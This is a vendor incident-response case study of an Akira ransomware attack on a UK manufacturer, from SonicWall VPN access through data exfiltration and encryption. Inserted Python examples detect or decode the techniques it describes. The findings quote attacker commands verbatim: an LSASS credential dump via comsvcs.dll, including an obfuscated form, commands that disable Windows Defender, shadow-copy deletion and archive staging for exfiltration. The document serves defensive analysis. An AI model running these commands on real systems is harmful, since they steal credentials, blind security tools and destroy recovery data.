Manufacturing, UK

30 Minutes to Root Cause

Akira Ransomware via SonicWall VPN Compromise

The Situation

The encryption was discovered at 06:47 on a Monday morning. A manufacturing company with 200 employees and three production facilities found their file servers locked, every encrypted file bearing the .akira extension. The ransom note, akira_readme.txt, referenced the group's Tor leak site and demanded $2.1 million in Bitcoin.

The DFIR consultancy was engaged within the hour. Akira had become one of the most prolific ransomware operations of 2025, generating over $42 million in ransom proceeds and compromising more than 350 organisations globally. This was not an unusual case for the group, but the pressure on the consultancy was significant.

Initial triage confirmed Akira deployment via Group Policy Object. But the questions that mattered remained open. How did they get in? Which accounts were compromised? What persistence mechanisms had they established? Production downtime was costing the client £40,000 per day, and cyber insurance required preliminary findings within 48 hours.

The Challenge

Imaging domain controllers and parsing terabytes of Windows Event Logs would take the consultancy three to five days. That timeline assumed experienced analysts working full-time on a single engagement.

Arctic Wolf had documented over 30 Akira intrusions since August 2024 involving SonicWall SSL VPNs. The pattern was consistent: compromised local accounts, disabled MFA, attacks completing in under four hours. The threat intelligence suggested this case would follow the same template.

The client needed answers quickly. Until the entry point was identified and persistence mechanisms removed, the organisation could not safely bring systems back online. Remediation without root cause analysis risked immediate reinfection.

The Investigation

Strand's collection agent was deployed to the domain controller and four suspected hosts within 15 minutes. The forensic analysis that followed would typically require days of manual work. Within 30 minutes, Strand had identified root cause and mapped the complete attack chain.

Finding 01

Initial Access: SonicWall SSL VPN Exploitation

The entry point was the organisation's SonicWall Gen 6 SSL VPN appliance running firmware version 6.5.4.14-109n. VPN authentication logs showed a successful login at 02:14 using the service account svc_backup, which had been dormant for 14 months. MFA was not enabled on this account.

Technical Detail

The attack leveraged CVE-2024-40766, a critical improper access control vulnerability in SonicWall SonicOS rated CVSS 9.3. CISA added this to the Known Exploited Vulnerabilities catalog on September 9, 2024. The account was a local SonicWall account not integrated with Active Directory. Credentials were likely purchased from an initial access broker, as the organisation had no evidence of credential phishing.

Finding 02

Persistence Mechanism #1: Cloudflared Tunnel

Seventeen minutes after initial access, at 02:31, the threat actor established a Cloudflared tunnel. This technique is standard for Akira operations because tunnel traffic appears as legitimate Cloudflare HTTPS connections and evades most network monitoring solutions.

Technical Detail

Strand identified a scheduled task named "CloudflareUpdate" in C:\Windows\System32\Tasks\ configured to execute cloudflared.exe from C:\ProgramData\ with a Base64-encoded tunnel token. The token structure contained the Cloudflare account ID, tunnel UUID, and tunnel secret. Command line: cloudflared.exe tunnel --config C:\ProgramData\config.yml run --token [BASE64_TOKEN]. The task was set to run at system startup and trigger on network connection.
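As an added illustration (not part of the original case study or of Strand's tooling), the following Python decodes the token from a scheduled-task command line of the form quoted above. cloudflared encodes the token as base64 JSON with keys a (account tag), t (tunnel UUID) and s (tunnel secret); the token and command line here are constructed, and the secret is never returned, because the account ID and tunnel UUID are the pivots needed to report the tunnel to Cloudflare and to hunt for other hosts running it.

```python
import base64
import json
import re
from typing import Optional

# Constructed token and command line in the shape of the scheduled task
# described above; none of these values are real.
_FAKE_TOKEN_JSON = json.dumps({
    "a": "0123456789abcdef0123456789abcdef",       # account tag (constructed)
    "t": "11111111-2222-3333-4444-555555555555",   # tunnel UUID (constructed)
    "s": base64.b64encode(b"constructed-tunnel-secret").decode(),
})
SAMPLE_COMMAND = (
    r"cloudflared.exe tunnel --config C:\ProgramData\config.yml run --token "
    + base64.b64encode(_FAKE_TOKEN_JSON.encode()).decode()
)


def extract_token(command_line: str) -> Optional[str]:
    """Return the argument following --token (either '--token X' or '--token=X')."""
    m = re.search(r"--token[= ]+(\S+)", command_line)
    return m.group(1) if m else None


def decode_tunnel_token(token: str) -> dict:
    """Decode a cloudflared tunnel token without exposing the secret.

    The token is base64 JSON with keys a (account tag), t (tunnel UUID) and
    s (tunnel secret). Account and tunnel IDs identify the attacker's tunnel
    to Cloudflare and let responders hunt other hosts running the same tunnel.
    """
    padded = token + "=" * (-len(token) % 4)  # tolerate stripped '=' padding
    fields = json.loads(base64.b64decode(padded))
    return {
        "account_id": fields["a"],
        "tunnel_id": fields["t"],
        "has_secret": bool(fields.get("s")),
    }


def triage_command_line(command_line: str) -> Optional[dict]:
    """Flag a 'cloudflared tunnel ... run --token' invocation and decode its token."""
    lowered = command_line.lower()
    if "cloudflared" not in lowered or " tunnel " not in lowered:
        return None
    token = extract_token(command_line)
    return decode_tunnel_token(token) if token else None
```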

Finding 03

Persistence Mechanism #2: AnyDesk Remote Access

A secondary persistence mechanism was AnyDesk, a legitimate remote management tool observed in over 43% of Akira incidents. The threat actor installed AnyDesk silently with unattended access configured, providing a backup access method independent of the Cloudflared tunnel.

Technical Detail

AnyDesk was installed to C:\ProgramData\AnyDesk\ with configuration enabling unattended access. Registry analysis at HKCU\Software\AnyDesk revealed the remote connection ID had been accessed from an IP address in Eastern Europe. Sophos detection signature: ATK/AnyDesk-A (when deployed maliciously).

Finding 04

Credential Harvesting: LSASS Memory Dump

At 03:12, the threat actor harvested credentials from the domain controller using the comsvcs.dll MiniDump method. This technique avoids dropping known tools like Mimikatz and is detected by Sophos as WIN-CRD-PRC-RUNDLL-COMSVCS-LSASS-1.

Technical Detail

Windows Security Event Log analysis (Event ID 4688) revealed execution of: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full. An obfuscated variant was also attempted: rundll32.exe comsvcs.dll, #+0000^24 [PID] C:\ProgramData\output.docx full. The dump files were deleted but recovered from $MFT entries.
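Added detection example (Python, not from the original report): it normalises Event ID 4688 command lines so that both forms quoted above are caught. The carets are cmd.exe escape characters stripped before rundll32 sees the arguments, and "#+0000^24" then resolves to export ordinal 24 of comsvcs.dll, which is MiniDump; the sample command lines are constructed.

```python
import re
from typing import Optional

# Constructed Event ID 4688 command lines modelled on the two forms quoted above,
# plus a benign rundll32 invocation; not real log data from the engagement.
SAMPLE_EVENTS = [
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full",
    r"rundll32.exe comsvcs.dll, #+0000^24 712 C:\ProgramData\output.docx full",
    r"rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl",
]

MINIDUMP_ORDINAL = 24  # export ordinal of comsvcs.dll!MiniDump


def normalise(command_line: str) -> str:
    """Undo cmd.exe-level obfuscation: '^' escapes are consumed by the shell
    before rundll32 sees the arguments, and quotes carry no meaning here."""
    return command_line.replace("^", "").replace('"', "")


def rundll32_entry(command_line: str) -> Optional[str]:
    """Return the 'dll,function' entry point of a rundll32 invocation, or None."""
    m = re.search(r"rundll32(?:\.exe)?\s+(\S+?)\s*,\s*(\S+)", normalise(command_line), re.I)
    if not m:
        return None
    dll = m.group(1).rsplit("\\", 1)[-1].lower()  # path-independent DLL name
    return f"{dll},{m.group(2)}"


def is_minidump_export(func: str) -> bool:
    """True for 'MiniDump' by name or for its ordinal in any rundll32 spelling.
    rundll32 treats a '#'-prefixed argument as a numeric ordinal, so '#24',
    '#+24' and '#+000024' all resolve to the same export."""
    if func.lower() == "minidump":
        return True
    if func.startswith("#"):
        try:
            return int(func[1:], 10) == MINIDUMP_ORDINAL
        except ValueError:
            return False
    return False


def detect_lsass_dump(command_line: str) -> bool:
    """Flag rundll32 comsvcs.dll MiniDump regardless of DLL path or ordinal obfuscation."""
    entry = rundll32_entry(command_line)
    if entry is None:
        return False
    dll, func = entry.split(",", 1)
    return dll == "comsvcs.dll" and is_minidump_export(func)
```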

Finding 05

Defence Evasion: EDR Disabling via BYOVD

Before lateral movement, the threat actor disabled Windows Defender and attempted to terminate the EDR agent using a Bring Your Own Vulnerable Driver (BYOVD) attack. They deployed PowerTool with the legitimate signed Zemana AntiMalware kernel driver (zamguard64.sys) to terminate security processes at the kernel level.

Technical Detail

Registry modification: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f. PowerShell: Set-MpPreference -DisableRealtimeMonitoring $true. The Zemana driver (CVE-2024-1853) provided raw SCSI disk access and process termination capabilities to kill EDR processes.

Finding 06

Data Exfiltration via RClone

Prior to encryption, approximately 290GB of data was exfiltrated using RClone, which is used in 57% of ransomware exfiltration incidents. Data was transferred to an attacker-controlled MEGA account over a two-hour window.

Technical Detail

RClone was deployed to C:\Windows\svchost.exe (renamed to evade detection). Configuration file at C:\Windows\rclone.conf referenced MEGA cloud storage. Sophos detection: EQL-WIN-EXF-PRC-SUSP-RCLONE-OPTION-1. Exfiltration was staged using WinRAR: WinRAR.exe a -ep1 -scul -r0 -iext [archive] [target_folders].
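Added example (Python, not from the original report) for the renamed-binary point in this finding and in the takeaways: compare the PE OriginalFileName recorded in a Sysmon Event ID 1 record with the on-disk image name, and look for rclone's argument shape (a transfer verb, a remote:path target and characteristic options) so that a rename to svchost.exe does not defeat detection. The records below are constructed.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 style records (Image, OriginalFileName, CommandLine)
# modelled on the renamed binary described above; not real data from the engagement.
SAMPLE_PROCESSES = [
    {"Image": r"C:\Windows\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'C:\Windows\svchost.exe copy "D:\Shares\Finance" mega:exfil --config C:\Windows\rclone.conf --transfers 16 -q'},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"Image": r"C:\Tools\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\Tools\rclone.exe sync D:\Backups gdrive:backups --config C:\Tools\rclone.conf"},
]

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "lsd"}
RCLONE_OPTIONS = {"--config", "--transfers", "--checkers", "--bwlimit", "--no-check-certificate", "-q"}
# remote:path uses a named remote of two or more characters, so drive letters (C:\) do not match
REMOTE_PATH = re.compile(r"^[A-Za-z][\w-]+:(?!//)")


def rclone_indicators(command_line: str) -> List[str]:
    """Return rclone-specific traits in a command line, independent of the image name."""
    tokens = command_line.split()
    found = []
    if tokens[1:2] and tokens[1].lower() in RCLONE_VERBS:  # the verb is rclone's first argument
        found.append("rclone-verb")
    if any(t.lower() in RCLONE_OPTIONS for t in tokens):
        found.append("rclone-option")
    if any(REMOTE_PATH.match(t) for t in tokens[1:]):
        found.append("remote-path")
    return found


def assess_process(event: Dict[str, str]) -> Dict[str, object]:
    """Score a process record: a renamed binary that behaves like rclone is high severity,
    legitimately named rclone is medium (review), everything else none."""
    image_name = event["Image"].rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    indicators = rclone_indicators(event["CommandLine"])
    # The on-disk name is attacker-controlled; OriginalFileName and the argument shape are not.
    renamed = bool(original) and original != image_name
    rclone_like = original == "rclone.exe" or len(indicators) >= 2
    severity = "high" if rclone_like and renamed else "medium" if rclone_like else "none"
    return {"image": image_name, "renamed_binary": renamed, "rclone_like": rclone_like,
            "indicators": indicators, "severity": severity}
```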

Finding 07

Ransomware Deployment via GPO

At 06:15, the Akira encryptor (w.exe) was deployed via Group Policy Object. 65 systems were encrypted within 32 minutes: the VMware ESXi hypervisors, all production virtual machines, and a handful of employee endpoints that had been left powered on overnight. Volume Shadow Copies were deleted and Windows event logs were cleared.

Technical Detail

The encryptor was staged in \\domain\SYSVOL\domain\scripts\w.exe. The GPO created two scheduled tasks: the first terminated processes via taskkill.exe, the second executed the encryptor. The overnight timing meant most employee workstations were offline, limiting endpoint impact; hypervisors and VMs bore the brunt of the attack. Shadow copy deletion: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}. The Security log was cleared (Event ID 1102) at 06:47. Encryption used a ChaCha8 + KCipher2 hybrid scheme with RSA-4096 for key protection.

Attack Timeline

Day -14

Credentials listed on access broker marketplace

  • Service account svc_backup credentials for sale
  • Likely harvested from infostealer malware on employee device

Initial access broker listing

Day 0, 02:14

VPN authentication

  • Successful login via SonicWall SSL VPN
  • No MFA on legacy service account

CVE-2024-40766 exploitation

Day 0, 02:31

Cloudflared tunnel established

  • Persistent C2 channel configured
  • Scheduled task for persistence

C:\ProgramData\cloudflared.exe

Day 0, 02:45

AnyDesk deployed

  • Secondary remote access established
  • Unattended access configured

C:\ProgramData\AnyDesk\

Day 0, 03:12

Credential harvesting

  • LSASS memory dump via comsvcs.dll
  • Domain Admin credentials obtained

Event ID 4688: rundll32.exe comsvcs.dll MiniDump

Day 0, 03:30

EDR disabled

  • Windows Defender disabled via registry and PowerShell
  • BYOVD attack with Zemana driver

zamguard64.sys kernel driver

Day 0, 04:00-05:45

Data exfiltration

  • 290GB staged with WinRAR
  • Exfiltrated via RClone to MEGA

C:\Windows\svchost.exe (renamed rclone)

Day 0, 06:15

Ransomware deployment

  • Akira encryptor w.exe via GPO
  • 65 systems encrypted (hypervisors, VMs, few endpoints)

ChaCha8 + KCipher2 + RSA-4096

Key Forensic Artifacts

  • Scheduled Task: C:\Windows\System32\Tasks\CloudflareUpdate
  • Registry: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1
  • Executable: C:\ProgramData\cloudflared.exe with tunnel token
  • RClone: C:\Windows\svchost.exe (renamed), config at C:\Windows\rclone.conf
  • LSASS Dump: C:\ProgramData\lsass.dmp (deleted, recovered from $MFT)
  • Zemana Driver: zamguard64.sys loaded for BYOVD attack
  • Ransom Note: akira_readme.txt in each encrypted directory
  • Event IDs: 4624, 4648, 4688, 4720 (account creation), 1102 (log cleared)

Key Takeaways

  1. SonicWall SSL VPN accounts must have MFA enabled, especially local accounts not integrated with Active Directory. CVE-2024-40766 exploitation requires only valid credentials when MFA is disabled.
  2. Cloudflared tunnels and legitimate RMM tools like AnyDesk are standard Akira persistence mechanisms. Monitor for installation of remote access tools and unusual scheduled tasks.
  3. The comsvcs.dll MiniDump technique and BYOVD attacks can disable EDR solutions. Behavioural monitoring for LSASS access and kernel driver loading is essential.
  4. RClone exfiltration to MEGA is the most common data theft method. Application whitelisting should not automatically trust renamed executables.
  5. Akira affiliates complete attacks in under four hours. Detection and response capabilities must match this operational tempo.
